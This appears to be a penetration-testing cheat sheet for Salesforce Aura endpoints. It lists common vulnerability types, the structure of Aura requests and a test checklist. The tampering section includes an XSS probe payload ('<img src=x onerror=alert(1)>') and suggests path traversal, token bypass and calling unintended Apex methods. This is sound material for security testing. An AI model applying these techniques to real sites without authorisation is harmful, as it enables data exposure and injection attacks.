TL;DR

  • Aura uses JSON payloads with message and aura.context.
  • Many issues come from parameter tampering and over-permissive Apex methods.
  • Focus on classname, method, and params in the request body.

Common Findings

Type Description
Unvalidated redirect aura.redirect, aura.token misuse
Parameter tampering action.setParams() without validation
DOM-based XSS Unsafe HTML merges in components
Access control bypass Public components in siteforce:communityApp
Endpoint injection Manipulated aura.context and message JSON
Insecure deserialization Caching/globals used unsafely

Anatomy of an Aura Request

Typical endpoint:

POST /sfsites/aura

Key parameters:

  • message - JSON with actions, classname, method, and params.
  • aura.context - App, framework UID, loaded components.
  • aura.token - CSRF-like token for some apps.

Test Checklist

  1. Change classname and method to locate unintended Apex methods.
  2. Fuzz params for injection and validation errors.
  3. Toggle aura.context.mode between PROD and DEV.
  4. Remove or fake aura.token to test enforcement.
  5. Look for data returned by unauthenticated calls.

Example Tampering Ideas

  • classname -> try other controllers like AccountController.
  • params -> try "<img src=x onerror=alert(1)>" or path traversal payloads.
  • aura.context -> invalid fwuid or mode to trigger debug output.

Notes

  • Always confirm which components are public vs authenticated.
  • Keep payload sizes small to avoid noisy failures.